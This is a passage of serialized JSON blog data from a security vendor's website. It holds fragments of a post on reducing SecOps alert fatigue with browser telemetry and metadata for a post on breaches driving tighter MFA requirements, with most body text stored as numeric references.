[75279],{"nodeType":173,"value":67467,"marks":75280,"data":75281},[],{},{"nodeType":178,"data":75283,"content":75284},{},[75285,75288,75295,75298,75305],{"nodeType":173,"value":67474,"marks":75286,"data":75287},[],{},{"nodeType":186,"data":75289,"content":75290},{"uri":819},[75291],{"nodeType":173,"value":27706,"marks":75292,"data":75294},[75293],{"type":194},{},{"nodeType":173,"value":67485,"marks":75296,"data":75297},[],{},{"nodeType":186,"data":75299,"content":75300},{"uri":598},[75301],{"nodeType":173,"value":67492,"marks":75302,"data":75304},[75303],{"type":194},{},{"nodeType":173,"value":67497,"marks":75306,"data":75307},[],{},{"nodeType":312,"data":75309,"content":75312},{"target":75310},{"sys":75311},{"id":67504,"type":317,"linkType":318},[],{"nodeType":178,"data":75314,"content":75315},{},[75316],{"nodeType":173,"value":67510,"marks":75317,"data":75318},[],{},{"nodeType":178,"data":75320,"content":75321},{},[75322,75325,75332],{"nodeType":173,"value":67517,"marks":75323,"data":75324},[],{},{"nodeType":186,"data":75326,"content":75327},{"uri":67522},[75328],{"nodeType":173,"value":67525,"marks":75329,"data":75331},[75330],{"type":194},{},{"nodeType":173,"value":67530,"marks":75333,"data":75334},[],{},{"nodeType":312,"data":75336,"content":75339},{"target":75337},{"sys":75338},{"id":67537,"type":317,"linkType":318},[],{"nodeType":178,"data":75341,"content":75342},{},[75343],{"nodeType":173,"value":67543,"marks":75344,"data":75345},[],{},{"nodeType":312,"data":75347,"content":75350},{"target":75348},{"sys":75349},{"id":67550,"type":317,"linkType":318},[],{"nodeType":231,"data":75352,"content":75353},{},[],{"nodeType":169,"data":75355,"content":75356},{},[75357],{"nodeType":173,"value":67559,"marks":75358,"data":75359},[],{},{"nodeType":178,"data":75361,"content":75362},{},[75363,75366,75372,75375,75379,75382,75386],{"nodeType":173,"value":67566,"marks":75364,"data":75365},[],{},{"nodeType":186,"data":75367,"content":75368},{"uri":188},[75369],{"nodeType":173,"value":67573,"marks":75370,"data":75371},[],{},{"nodeType":173,"value":67577,"marks":75373,"data":75374},[],{},{"nodeType":173,"value":67581,"marks":75376,"data":75378},[75377],{"type":370},{},{"nodeType":173,"value":67586,"marks":75380,"data":75381},[],{},{"nodeType":173,"value":67590,"marks":75383,"data":75385},[75384],{"type":370},{},{"nodeType":173,"value":67595,"marks":75387,"data":75388},[],{},{"nodeType":178,"data":75390,"content":75391},{},[75392],{"nodeType":173,"value":67602,"marks":75393,"data":75394},[],{},{"nodeType":250,"data":75396,"content":75397},{},[75398,75407,75416,75425],{"nodeType":254,"data":75399,"content":75400},{},[75401],{"nodeType":178,"data":75402,"content":75403},{},[75404],{"nodeType":173,"value":67615,"marks":75405,"data":75406},[],{},{"nodeType":254,"data":75408,"content":75409},{},[75410],{"nodeType":178,"data":75411,"content":75412},{},[75413],{"nodeType":173,"value":67625,"marks":75414,"data":75415},[],{},{"nodeType":254,"data":75417,"content":75418},{},[75419],{"nodeType":178,"data":75420,"content":75421},{},[75422],{"nodeType":173,"value":67635,"marks":75423,"data":75424},[],{},{"nodeType":254,"data":75426,"content":75427},{},[75428],{"nodeType":178,"data":75429,"content":75430},{},[75431],{"nodeType":173,"value":67645,"marks":75432,"data":75433},[],{},{"nodeType":178,"data":75435,"content":75436},{},[75437],{"nodeType":173,"value":67652,"marks":75438,"data":75439},[],{},{"nodeType":312,"data":75441,"content":75444},{"target":75442},{"sys":75443},{"id":67659,"type":317,"linkType":318},[],{"nodeType":178,"data":75446,"content":75447},{},[75448],{"nodeType":173,"value":67665,"marks":75449,"data":75450},[],{},{"nodeType":178,"data":75452,"content":75453},{},[75454],{"nodeType":173,"value":67672,"marks":75455,"data":75456},[],{},{"nodeType":231,"data":75458,"content":75459},{},[],{"nodeType":169,"data":75461,"content":75462},{},[75463],{"nodeType":173,"value":67682,"marks":75464,"data":75465},[],{},{"nodeType":178,"data":75467,"content":75468},{},[75469],{"nodeType":173,"value":67689,"marks":75470,"data":75471},[],{},{"nodeType":178,"data":75473,"content":75474},{},[75475],{"nodeType":173,"value":67696,"marks":75476,"data":75477},[],{},{"nodeType":178,"data":75479,"content":75480},{},[75481,75484,75491],{"nodeType":173,"value":67703,"marks":75482,"data":75483},[],{},{"nodeType":186,"data":75485,"content":75486},{"uri":9120},[75487],{"nodeType":173,"value":67710,"marks":75488,"data":75490},[75489],{"type":194},{},{"nodeType":173,"value":67715,"marks":75492,"data":75493},[],{},{"nodeType":312,"data":75495,"content":75498},{"target":75496},{"sys":75497},{"id":67722,"type":317,"linkType":318},[],{"nodeType":235,"data":75500,"content":75501},{},[75502],{"nodeType":173,"value":67728,"marks":75503,"data":75504},[],{},{"nodeType":178,"data":75506,"content":75507},{},[75508],{"nodeType":173,"value":67735,"marks":75509,"data":75510},[],{},{"nodeType":178,"data":75512,"content":75513},{},[75514],{"nodeType":173,"value":67742,"marks":75515,"data":75516},[],{},{"nodeType":312,"data":75518,"content":75521},{"target":75519},{"sys":75520},{"id":67749,"type":317,"linkType":318},[],{"nodeType":178,"data":75523,"content":75524},{},[75525],{"nodeType":173,"value":67755,"marks":75526,"data":75527},[],{},{"nodeType":312,"data":75529,"content":75532},{"target":75530},{"sys":75531},{"id":67762,"type":317,"linkType":318},[],{"nodeType":231,"data":75534,"content":75535},{},[],{"nodeType":169,"data":75537,"content":75538},{},[75539],{"nodeType":173,"value":20431,"marks":75540,"data":75541},[],{},{"nodeType":178,"data":75543,"content":75544},{},[75545],{"nodeType":173,"value":67777,"marks":75546,"data":75547},[],{},{"nodeType":178,"data":75549,"content":75550},{},[75551],{"nodeType":173,"value":67784,"marks":75552,"data":75553},[],{},{"nodeType":178,"data":75555,"content":75556},{},[75557,75560,75566,75569,75575],{"nodeType":173,"value":1451,"marks":75558,"data":75559},[],{},{"nodeType":186,"data":75561,"content":75562},{"uri":1456},[75563],{"nodeType":173,"value":1459,"marks":75564,"data":75565},[],{},{"nodeType":173,"value":1464,"marks":75567,"data":75568},[],{},{"nodeType":186,"data":75570,"content":75571},{"uri":1469},[75572],{"nodeType":173,"value":1472,"marks":75573,"data":75574},[],{},{"nodeType":173,"value":1477,"marks":75576,"data":75577},[],{},{"entries":75579},{"hyperlink":75580,"inline":75581,"block":75582},[],[],[75583,75591,75595,75601,75615,75659,75665,75672],{"sys":75584,"__typename":5345,"title":75585,"caption":75586,"layoutMode":118,"file":75587},{"id":67461},"Account takeover on third-party web app","Modern attack paths usually involve direct in-app compromise following account takeover, skipping several phases (and detection opportunities) in traditional “attack chain” models.",{"url":75588,"width":75589,"height":75590},"https://images.ctfassets.net/y1cdw1ablpvd/3DOQd2fcWYdjMSVBZZvHHU/2cd487cb316aef8acd77e14a1960c391/SaaS_attack_path.png",1362,458,{"sys":75592,"__typename":15269,"type":15270,"ctaText":75593,"buttonLabel":75594,"buttonColour":15273,"buttonUrl":5002},{"id":67504},"Read about \"Scattered Lapsus$ Hunters\", the cybercrime supergroup behind the biggest breaches since 2021. ","Read More",{"sys":75596,"__typename":5345,"title":75597,"caption":75597,"layoutMode":118,"file":75598},{"id":67537},"Modern attacks start in the browser, and can traverse multiple environments/domains, simultaneously. Not every attack takes the same, linear route through your environment. ",{"url":75599,"width":5358,"height":75600},"https://images.ctfassets.net/y1cdw1ablpvd/5EFB28UzL8aSaZJ18pJKSa/cb7375e4e3ecc7bd7eb5b422fa9cdcd5/image5.png",1102,{"sys":75602,"__typename":5311,"content":75603,"name":75614,"title":118},{"id":67550},{"json":75604},{"nodeType":165,"data":75605,"content":75606},{},[75607],{"nodeType":178,"data":75608,"content":75609},{},[75610],{"nodeType":173,"value":75611,"marks":75612,"data":75613},"To tackle attacks that are designed to evade traditional detection surfaces and take place mostly over the internet, we must integrate browser telemetry into our detection and response framework, and expand detection engineering and threat hunting processes to incorporate this new dataset. ",[],{},"Fixing SecOps alert fatigue insight box 1",{"sys":75616,"__typename":5311,"content":75617,"name":75658,"title":118},{"id":67659},{"json":75618},{"nodeType":165,"data":75619,"content":75620},{},[75621],{"nodeType":178,"data":75622,"content":75623},{},[75624,75627,75636,75640,75645,75649,75654],{"nodeType":173,"value":37,"marks":75625,"data":75626},[],{},{"nodeType":186,"data":75628,"content":75630},{"uri":75629},"https://medium.com/starting-up-security/lessons-learned-in-detection-engineering-304aec709856",[75631],{"nodeType":173,"value":75632,"marks":75633,"data":75635},"This is what Ryan McGeehan called",[75634],{"type":194},{},{"nodeType":173,"value":75637,"marks":75638,"data":75639}," the “Law of the Lever” several years ago, and it still holds true today: The time spent creating a poor quality detection rule will likely create a significant amount of work for someone responding to the follow up alert. ",[],{},{"nodeType":173,"value":75641,"marks":75642,"data":75644},"This doesn’t mean that only high fidelity analytics have value",[75643],{"type":370},{},{"nodeType":173,"value":75646,"marks":75647,"data":75648},"; we still need general environment telemetry to test investigative hypotheses and identify new use cases. But we can’t allocate sufficient resources to those tasks while ",[],{},{"nodeType":173,"value":61401,"marks":75650,"data":75653},[75651,75652],{"type":370},{"type":194},{},{"nodeType":173,"value":75655,"marks":75656,"data":75657}," dealing with low quality alerts.",[],{},"secops article insight box 2",{"sys":75660,"__typename":5345,"title":75661,"caption":75661,"layoutMode":118,"file":75662},{"id":67722},"Being in the browser provides new opportunities to detect and block attacks like phishing.",{"url":75663,"width":5358,"height":75664},"https://images.ctfassets.net/y1cdw1ablpvd/7jo4A0IFI3Z3mLqDki64zz/fb13af5af1443e71a7d113022eda2a62/image4.png",1469,{"sys":75666,"__typename":5345,"title":75667,"caption":75668,"layoutMode":118,"file":75669},{"id":67749},"Defending the browser reduces the risk of breach","Defending the browser reduces the risk of breach by tackling the earliest indicators of attack.",{"url":75670,"width":5358,"height":75671},"https://images.ctfassets.net/y1cdw1ablpvd/2ryvgEISjcNDDvcPEptdzy/ce1bfaf82f09684515fa0e9ecd86f6c3/image1.png",1209,{"sys":75673,"__typename":5311,"content":75674,"name":75685,"title":118},{"id":67762},{"json":75675},{"nodeType":165,"data":75676,"content":75677},{},[75678],{"nodeType":178,"data":75679,"content":75680},{},[75681],{"nodeType":173,"value":75682,"marks":75683,"data":75684},"The psychological impact of this shift cannot be overstated. When analysts know that every alert represents a genuine threat that was successfully mitigated, their job satisfaction increases, burnout decreases, and the overall security posture improves dramatically.",[],{},"secops article insight box 3","content:blog:fixing-secops-alert-fatigue-with-browser-telemetry.json","blog/fixing-secops-alert-fatigue-with-browser-telemetry.json","blog/fixing-secops-alert-fatigue-with-browser-telemetry",{"_path":75690,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":75691,"ogImage":118,"summary":75693,"title":27231,"subtitle":118,"metaTitle":75704,"synopsis":27232,"hashTags":118,"publishedDate":27233,"slug":27234,"tagsCollection":75705,"relatedBlogPostsCollection":75711,"authorsCollection":77680,"content":77684,"_id":78158,"_type":5439,"_source":5440,"_file":78159,"_stem":78160,"_extension":5439},"/blog/how-cyber-breaches-are-driving-tighter-mfa-requirements-and-enforcement",{"id":26731,"publishedAt":75692},"2025-09-19T08:25:14.165Z",{"json":75694},{"data":75695,"content":75696,"nodeType":165},{},[75697],{"data":75698,"content":75699,"nodeType":178},{},[75700],{"data":75701,"marks":75702,"value":75703,"nodeType":173},{},[],"MFA regulators, insurers, and policy-makers are getting tighter on their MFA requirements, fuelled by public cyber breaches. Here's what security teams need to know about the current regulatory and insurance landscape — and how the evolution of attacks is likely to influence the future of requirements.","How cyber breaches are driving tighter MFA requirements",{"items":75706},[75707,75709],{"sys":75708,"name":505},{"id":504},{"sys":75710,"name":26137},{"id":26136},{"items":75712},[75713,76278,76978],{"__typename":1528,"sys":75714,"content":75715,"title":60690,"synopsis":60691,"hashTags":118,"publishedDate":60692,"slug":60693,"tagsCollection":76268,"authorsCollection":76274},{"id":60053},{"json":75716},{"data":75717,"content":75718,"nodeType":165},{},[75719,75732,75738,75741,75748,75754,75760,75776,75781,75787,75793,75799,75805,75808,75815,75821,75826,75832,75839,75845,75851,75856,75872,75877,75883,75889,75895,75900,75903,75910,75926,75932,75958,75964,75970,75975,75981,75987,75993,75996,76003,76018,76023,76029,76035,76040,76046,76052,76055,76062,76068,76084,76120,76126,76132,76138,76141,76148,76154,76160,76166,76169,76176,76182,76208,76224,76230,76233,76240,76246,76252],{"data":75720,"content":75721,"nodeType":178},{},[75722,75725,75729],{"data":75723,"marks":75724,"value":60064,"nodeType":173},{},[],{"data":75726,"marks":75727,"value":60069,"nodeType":173},{},[75728],{"type":1646},{"data":75730,"marks":75731,"value":60073,"nodeType":173},{},[],{"data":75733,"content":75734,"nodeType":178},{},[75735],{"data":75736,"marks":75737,"value":60080,"nodeType":173},{},[],{"data":75739,"content":75740,"nodeType":231},{},[],{"data":75742,"content":75743,"nodeType":169},{},[75744],{"data":75745,"marks":75746,"value":60091,"nodeType":173},{},[75747],{"type":370},{"data":75749,"content":75750,"nodeType":178},{},[75751],{"data":75752,"marks":75753,"value":60098,"nodeType":173},{},[],{"data":75755,"content":75756,"nodeType":178},{},[75757],{"data":75758,"marks":75759,"value":60105,"nodeType":173},{},[],{"data":75761,"content":75762,"nodeType":178},{},[75763,75766,75773],{"data":75764,"marks":75765,"value":60112,"nodeType":173},{},[],{"data":75767,"content":75768,"nodeType":186},{"uri":60115},[75769],{"data":75770,"marks":75771,"value":27706,"nodeType":173},{},[75772],{"type":194},{"data":75774,"marks":75775,"value":60124,"nodeType":173},{},[],{"data":75777,"content":75780,"nodeType":312},{"target":75778},{"sys":75779},{"id":60129,"type":317,"linkType":318},[],{"data":75782,"content":75783,"nodeType":178},{},[75784],{"data":75785,"marks":75786,"value":60137,"nodeType":173},{},[],{"data":75788,"content":75789,"nodeType":178},{},[75790],{"data":75791,"marks":75792,"value":60144,"nodeType":173},{},[],{"data":75794,"content":75795,"nodeType":178},{},[75796],{"data":75797,"marks":75798,"value":60151,"nodeType":173},{},[],{"data":75800,"content":75801,"nodeType":178},{},[75802],{"data":75803,"marks":75804,"value":60158,"nodeType":173},{},[],{"data":75806,"content":75807,"nodeType":231},{},[],{"data":75809,"content":75810,"nodeType":169},{},[75811],{"data":75812,"marks":75813,"value":60169,"nodeType":173},{},[75814],{"type":370},{"data":75816,"content":75817,"nodeType":178},{},[75818],{"data":75819,"marks":75820,"value":60176,"nodeType":173},{},[],{"data":75822,"content":75825,"nodeType":312},{"target":75823},{"sys":75824},{"id":27196,"type":317,"linkType":318},[],{"data":75827,"content":75828,"nodeType":178},{},[75829],{"data":75830,"marks":75831,"value":60188,"nodeType":173},{},[],{"data":75833,"content":75834,"nodeType":235},{},[75835],{"data":75836,"marks":75837,"value":60196,"nodeType":173},{},[75838],{"type":370},{"data":75840,"content":75841,"nodeType":178},{},[75842],{"data":75843,"marks":75844,"value":60203,"nodeType":173},{},[],{"data":75846,"content":75847,"nodeType":178},{},[75848],{"data":75849,"marks":75850,"value":60210,"nodeType":173},{},[],{"data":75852,"content":75855,"nodeType":312},{"target":75853},{"sys":75854},{"id":60215,"type":317,"linkType":318},[],{"data":75857,"content":75858,"nodeType":178},{},[75859,75862,75869],{"data":75860,"marks":75861,"value":60223,"nodeType":173},{},[],{"data":75863,"content":75864,"nodeType":186},{"uri":60226},[75865],{"data":75866,"marks":75867,"value":39789,"nodeType":173},{},[75868],{"type":194},{"data":75870,"marks":75871,"value":60235,"nodeType":173},{},[],{"data":75873,"content":75876,"nodeType":312},{"target":75874},{"sys":75875},{"id":60240,"type":317,"linkType":318},[],{"data":75878,"content":75879,"nodeType":178},{},[75880],{"data":75881,"marks":75882,"value":60248,"nodeType":173},{},[],{"data":75884,"content":75885,"nodeType":178},{},[75886],{"data":75887,"marks":75888,"value":21384,"nodeType":173},{},[],{"data":75890,"content":75891,"nodeType":178},{},[75892],{"data":75893,"marks":75894,"value":60261,"nodeType":173},{},[],{"data":75896,"content":75899,"nodeType":312},{"target":75897},{"sys":75898},{"id":60266,"type":317,"linkType":318},[],{"data":75901,"content":75902,"nodeType":231},{},[],{"data":75904,"content":75905,"nodeType":235},{},[75906],{"data":75907,"marks":75908,"value":60278,"nodeType":173},{},[75909],{"type":370},{"data":75911,"content":75912,"nodeType":178},{},[75913,75916,75923],{"data":75914,"marks":75915,"value":21114,"nodeType":173},{},[],{"data":75917,"content":75918,"nodeType":186},{"uri":21119},[75919],{"data":75920,"marks":75921,"value":1845,"nodeType":173},{},[75922],{"type":194},{"data":75924,"marks":75925,"value":197,"nodeType":173},{},[],{"data":75927,"content":75928,"nodeType":178},{},[75929],{"data":75930,"marks":75931,"value":60301,"nodeType":173},{},[],{"data":75933,"content":75934,"nodeType":178},{},[75935,75938,75945,75948,75955],{"data":75936,"marks":75937,"value":60308,"nodeType":173},{},[],{"data":75939,"content":75940,"nodeType":186},{"uri":21280},[75941],{"data":75942,"marks":75943,"value":21283,"nodeType":173},{},[75944],{"type":194},{"data":75946,"marks":75947,"value":60319,"nodeType":173},{},[],{"data":75949,"content":75950,"nodeType":186},{"uri":60322},[75951],{"data":75952,"marks":75953,"value":60328,"nodeType":173},{},[75954],{"type":194},{"data":75956,"marks":75957,"value":1477,"nodeType":173},{},[],{"data":75959,"content":75960,"nodeType":178},{},[75961],{"data":75962,"marks":75963,"value":60338,"nodeType":173},{},[],{"data":75965,"content":75966,"nodeType":178},{},[75967],{"data":75968,"marks":75969,"value":60345,"nodeType":173},{},[],{"data":75971,"content":75974,"nodeType":312},{"target":75972},{"sys":75973},{"id":60350,"type":317,"linkType":318},[],{"data":75976,"content":75977,"nodeType":178},{},[75978],{"data":75979,"marks":75980,"value":60358,"nodeType":173},{},[],{"data":75982,"content":75983,"nodeType":178},{},[75984],{"data":75985,"marks":75986,"value":60365,"nodeType":173},{},[],{"data":75988,"content":75989,"nodeType":178},{},[75990],{"data":75991,"marks":75992,"value":60372,"nodeType":173},{},[],{"data":75994,"content":75995,"nodeType":231},{},[],{"data":75997,"content":75998,"nodeType":235},{},[75999],{"data":76000,"marks":76001,"value":60383,"nodeType":173},{},[76002],{"type":370},{"data":76004,"content":76005,"nodeType":178},{},[76006,76009,76015],{"data":76007,"marks":76008,"value":60390,"nodeType":173},{},[],{"data":76010,"content":76011,"nodeType":186},{"uri":19838},[76012],{"data":76013,"marks":76014,"value":8091,"nodeType":173},{},[],{"data":76016,"marks":76017,"value":2340,"nodeType":173},{},[],{"data":76019,"content":76022,"nodeType":312},{"target":76020},{"sys":76021},{"id":60404,"type":317,"linkType":318},[],{"data":76024,"content":76025,"nodeType":178},{},[76026],{"data":76027,"marks":76028,"value":60412,"nodeType":173},{},[],{"data":76030,"content":76031,"nodeType":178},{},[76032],{"data":76033,"marks":76034,"value":60419,"nodeType":173},{},[],{"data":76036,"content":76039,"nodeType":312},{"target":76037},{"sys":76038},{"id":60424,"type":317,"linkType":318},[],{"data":76041,"content":76042,"nodeType":178},{},[76043],{"data":76044,"marks":76045,"value":60432,"nodeType":173},{},[],{"data":76047,"content":76048,"nodeType":178},{},[76049],{"data":76050,"marks":76051,"value":60439,"nodeType":173},{},[],{"data":76053,"content":76054,"nodeType":231},{},[],{"data":76056,"content":76057,"nodeType":235},{},[76058],{"data":76059,"marks":76060,"value":60450,"nodeType":173},{},[76061],{"type":370},{"data":76063,"content":76064,"nodeType":178},{},[76065],{"data":76066,"marks":76067,"value":60457,"nodeType":173},{},[],{"data":76069,"content":76070,"nodeType":178},{},[76071,76074,76081],{"data":76072,"marks":76073,"value":60464,"nodeType":173},{},[],{"data":76075,"content":76076,"nodeType":186},{"uri":60467},[76077],{"data":76078,"marks":76079,"value":60473,"nodeType":173},{},[76080],{"type":194},{"data":76082,"marks":76083,"value":60477,"nodeType":173},{},[],{"data":76085,"content":76086,"nodeType":178},{},[76087,76090,76097,76100,76107,76110,76117],{"data":76088,"marks":76089,"value":60484,"nodeType":173},{},[],{"data":76091,"content":76092,"nodeType":186},{"uri":60487},[76093],{"data":76094,"marks":76095,"value":60493,"nodeType":173},{},[76096],{"type":194},{"data":76098,"marks":76099,"value":60497,"nodeType":173},{},[],{"data":76101,"content":76102,"nodeType":186},{"uri":60500},[76103],{"data":76104,"marks":76105,"value":60506,"nodeType":173},{},[76106],{"type":194},{"data":76108,"marks":76109,"value":9534,"nodeType":173},{},[],{"data":76111,"content":76112,"nodeType":186},{"uri":60512},[76113],{"data":76114,"marks":76115,"value":60518,"nodeType":173},{},[76116],{"type":194},{"data":76118,"marks":76119,"value":1477,"nodeType":173},{},[],{"data":76121,"content":76122,"nodeType":178},{},[76123],{"data":76124,"marks":76125,"value":60528,"nodeType":173},{},[],{"data":76127,"content":76128,"nodeType":178},{},[76129],{"data":76130,"marks":76131,"value":60535,"nodeType":173},{},[],{"data":76133,"content":76134,"nodeType":178},{},[76135],{"data":76136,"marks":76137,"value":60542,"nodeType":173},{},[],{"data":76139,"content":76140,"nodeType":231},{},[],{"data":76142,"content":76143,"nodeType":235},{},[76144],{"data":76145,"marks":76146,"value":60553,"nodeType":173},{},[76147],{"type":370},{"data":76149,"content":76150,"nodeType":178},{},[76151],{"data":76152,"marks":76153,"value":60560,"nodeType":173},{},[],{"data":76155,"content":76156,"nodeType":178},{},[76157],{"data":76158,"marks":76159,"value":60567,"nodeType":173},{},[],{"data":76161,"content":76162,"nodeType":178},{},[76163],{"data":76164,"marks":76165,"value":60574,"nodeType":173},{},[],{"data":76167,"content":76168,"nodeType":231},{},[],{"data":76170,"content":76171,"nodeType":235},{},[76172],{"data":76173,"marks":76174,"value":60585,"nodeType":173},{},[76175],{"type":370},{"data":76177,"content":76178,"nodeType":178},{},[76179],{"data":76180,"marks":76181,"value":60592,"nodeType":173},{},[],{"data":76183,"content":76184,"nodeType":178},{},[76185,76188,76195,76198,76205],{"data":76186,"marks":76187,"value":60599,"nodeType":173},{},[],{"data":76189,"content":76190,"nodeType":186},{"uri":60115},[76191],{"data":76192,"marks":76193,"value":27706,"nodeType":173},{},[76194],{"type":194},{"data":76196,"marks":76197,"value":60610,"nodeType":173},{},[],{"data":76199,"content":76200,"nodeType":186},{"uri":60613},[76201],{"data":76202,"marks":76203,"value":27729,"nodeType":173},{},[76204],{"type":194},{"data":76206,"marks":76207,"value":60622,"nodeType":173},{},[],{"data":76209,"content":76210,"nodeType":178},{},[76211,76214,76221],{"data":76212,"marks":76213,"value":60629,"nodeType":173},{},[],{"data":76215,"content":76216,"nodeType":186},{"uri":60632},[76217],{"data":76218,"marks":76219,"value":60638,"nodeType":173},{},[76220],{"type":194},{"data":76222,"marks":76223,"value":60642,"nodeType":173},{},[],{"data":76225,"content":76226,"nodeType":178},{},[76227],{"data":76228,"marks":76229,"value":60649,"nodeType":173},{},[],{"data":76231,"content":76232,"nodeType":231},{},[],{"data":76234,"content":76235,"nodeType":169},{},[76236],{"data":76237,"marks":76238,"value":40632,"nodeType":173},{},[76239],{"type":370},{"data":76241,"content":76242,"nodeType":178},{},[76243],{"data":76244,"marks":76245,"value":60666,"nodeType":173},{},[],{"data":76247,"content":76248,"nodeType":178},{},[76249],{"data":76250,"marks":76251,"value":27202,"nodeType":173},{},[],{"data":76253,"content":76254,"nodeType":178},{},[76255,76258,76265],{"data":76256,"marks":76257,"value":59468,"nodeType":173},{},[],{"data":76259,"content":76260,"nodeType":186},{"uri":60681},[76261],{"data":76262,"marks":76263,"value":1472,"nodeType":173},{},[76264],{"type":194},{"data":76266,"marks":76267,"value":1477,"nodeType":173},{},[],{"items":76269},[76270,76272],{"sys":76271,"name":505},{"id":504},{"sys":76273,"name":509},{"id":508},{"items":76275},[76276],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":76277},{"url":1496},{"__typename":1528,"sys":76279,"content":76280,"title":4774,"synopsis":4775,"hashTags":118,"publishedDate":4776,"slug":4777,"tagsCollection":76970,"authorsCollection":76974},{"id":3979},{"json":76281},{"data":76282,"content":76283,"nodeType":165},{},[76284,76289,76305,76311,76317,76322,76325,76332,76338,76354,76364,76370,76376,76382,76466,76469,76476,76551,76556,76559,76566,76573,76579,76585,76592,76608,76614,76621,76627,76633,76640,76646,76652,76668,76673,76676,76683,76690,76696,76785,76791,76798,76804,76810,76815,76822,76828,76834,76840,76847,76853,76859,76865,76871,76876,76879,76886,76892,76922,76928,76943,76959,76964],{"data":76285,"content":76288,"nodeType":312},{"target":76286},{"sys":76287},{"id":3988,"type":317,"linkType":318},[],{"data":76290,"content":76291,"nodeType":178},{},[76292,76295,76302],{"data":76293,"marks":76294,"value":3996,"nodeType":173},{},[],{"data":76296,"content":76297,"nodeType":186},{"uri":3999},[76298],{"data":76299,"marks":76300,"value":4005,"nodeType":173},{},[76301],{"type":194},{"data":76303,"marks":76304,"value":4009,"nodeType":173},{},[],{"data":76306,"content":76307,"nodeType":178},{},[76308],{"data":76309,"marks":76310,"value":4016,"nodeType":173},{},[],{"data":76312,"content":76313,"nodeType":178},{},[76314],{"data":76315,"marks":76316,"value":4023,"nodeType":173},{},[],{"data":76318,"content":76321,"nodeType":312},{"target":76319},{"sys":76320},{"id":4028,"type":317,"linkType":318},[],{"data":76323,"content":76324,"nodeType":231},{},[],{"data":76326,"content":76327,"nodeType":169},{},[76328],{"data":76329,"marks":76330,"value":4040,"nodeType":173},{},[76331],{"type":370},{"data":76333,"content":76334,"nodeType":178},{},[76335],{"data":76336,"marks":76337,"value":4047,"nodeType":173},{},[],{"data":76339,"content":76340,"nodeType":178},{},[76341,76344,76351],{"data":76342,"marks":76343,"value":4054,"nodeType":173},{},[],{"data":76345,"content":76346,"nodeType":186},{"uri":4057},[76347],{"data":76348,"marks":76349,"value":4063,"nodeType":173},{},[76350],{"type":194},{"data":76352,"marks":76353,"value":197,"nodeType":173},{},[],{"data":76355,"content":76356,"nodeType":3769},{},[76357],{"data":76358,"content":76359,"nodeType":178},{},[76360],{"data":76361,"marks":76362,"value":4077,"nodeType":173},{},[76363],{"type":370},{"data":76365,"content":76366,"nodeType":178},{},[76367],{"data":76368,"marks":76369,"value":4084,"nodeType":173},{},[],{"data":76371,"content":76372,"nodeType":178},{},[76373],{"data":76374,"marks":76375,"value":4091,"nodeType":173},{},[],{"data":76377,"content":76378,"nodeType":178},{},[76379],{"data":76380,"marks":76381,"value":4098,"nodeType":173},{},[],{"data":76383,"content":76384,"nodeType":250},{},[76385,76394,76403,76412,76421,76430,76439,76448,76457],{"data":76386,"content":76387,"nodeType":254},{},[76388],{"data":76389,"content":76390,"nodeType":178},{},[76391],{"data":76392,"marks":76393,"value":4111,"nodeType":173},{},[],{"data":76395,"content":76396,"nodeType":254},{},[76397],{"data":76398,"content":76399,"nodeType":178},{},[76400],{"data":76401,"marks":76402,"value":4121,"nodeType":173},{},[],{"data":76404,"content":76405,"nodeType":254},{},[76406],{"data":76407,"content":76408,"nodeType":178},{},[76409],{"data":76410,"marks":76411,"value":4131,"nodeType":173},{},[],{"data":76413,"content":76414,"nodeType":254},{},[76415],{"data":76416,"content":76417,"nodeType":178},{},[76418],{"data":76419,"marks":76420,"value":4141,"nodeType":173},{},[],{"data":76422,"content":76423,"nodeType":254},{},[76424],{"data":76425,"content":76426,"nodeType":178},{},[76427],{"data":76428,"marks":76429,"value":4151,"nodeType":173},{},[],{"data":76431,"content":76432,"nodeType":254},{},[76433],{"data":76434,"content":76435,"nodeType":178},{},[76436],{"data":76437,"marks":76438,"value":4161,"nodeType":173},{},[],{"data":76440,"content":76441,"nodeType":254},{},[76442],{"data":76443,"content":76444,"nodeType":178},{},[76445],{"data":76446,"marks":76447,"value":4171,"nodeType":173},{},[],{"data":76449,"content":76450,"nodeType":254},{},[76451],{"data":76452,"content":76453,"nodeType":178},{},[76454],{"data":76455,"marks":76456,"value":4181,"nodeType":173},{},[],{"data":76458,"content":76459,"nodeType":254},{},[76460],{"data":76461,"content":76462,"nodeType":178},{},[76463],{"data":76464,"marks":76465,"value":4191,"nodeType":173},{},[],{"data":76467,"content":76468,"nodeType":231},{},[],{"data":76470,"content":76471,"nodeType":169},{},[76472],{"data":76473,"marks":76474,"value":4202,"nodeType":173},{},[76475],{"type":370},{"data":76477,"content":76478,"nodeType":250},{},[76479,76488,76497,76506,76515,76524,76533,76542],{"data":76480,"content":76481,"nodeType":254},{},[76482],{"data":76483,"content":76484,"nodeType":178},{},[76485],{"data":76486,"marks":76487,"value":4215,"nodeType":173},{},[],{"data":76489,"content":76490,"nodeType":254},{},[76491],{"data":76492,"content":76493,"nodeType":178},{},[76494],{"data":76495,"marks":76496,"value":4225,"nodeType":173},{},[],{"data":76498,"content":76499,"nodeType":254},{},[76500],{"data":76501,"content":76502,"nodeType":178},{},[76503],{"data":76504,"marks":76505,"value":4235,"nodeType":173},{},[],{"data":76507,"content":76508,"nodeType":254},{},[76509],{"data":76510,"content":76511,"nodeType":178},{},[76512],{"data":76513,"marks":76514,"value":4245,"nodeType":173},{},[],{"data":76516,"content":76517,"nodeType":254},{},[76518],{"data":76519,"content":76520,"nodeType":178},{},[76521],{"data":76522,"marks":76523,"value":4255,"nodeType":173},{},[],{"data":76525,"content":76526,"nodeType":254},{},[76527],{"data":76528,"content":76529,"nodeType":178},{},[76530],{"data":76531,"marks":76532,"value":4265,"nodeType":173},{},[],{"data":76534,"content":76535,"nodeType":254},{},[76536],{"data":76537,"content":76538,"nodeType":178},{},[76539],{"data":76540,"marks":76541,"value":4275,"nodeType":173},{},[],{"data":76543,"content":76544,"nodeType":254},{},[76545],{"data":76546,"content":76547,"nodeType":178},{},[76548],{"data":76549,"marks":76550,"value":4285,"nodeType":173},{},[],{"data":76552,"content":76555,"nodeType":312},{"target":76553},{"sys":76554},{"id":4290,"type":317,"linkType":318},[],{"data":76557,"content":76558,"nodeType":231},{},[],{"data":76560,"content":76561,"nodeType":169},{},[76562],{"data":76563,"marks":76564,"value":4302,"nodeType":173},{},[76565],{"type":370},{"data":76567,"content":76568,"nodeType":235},{},[76569],{"data":76570,"marks":76571,"value":43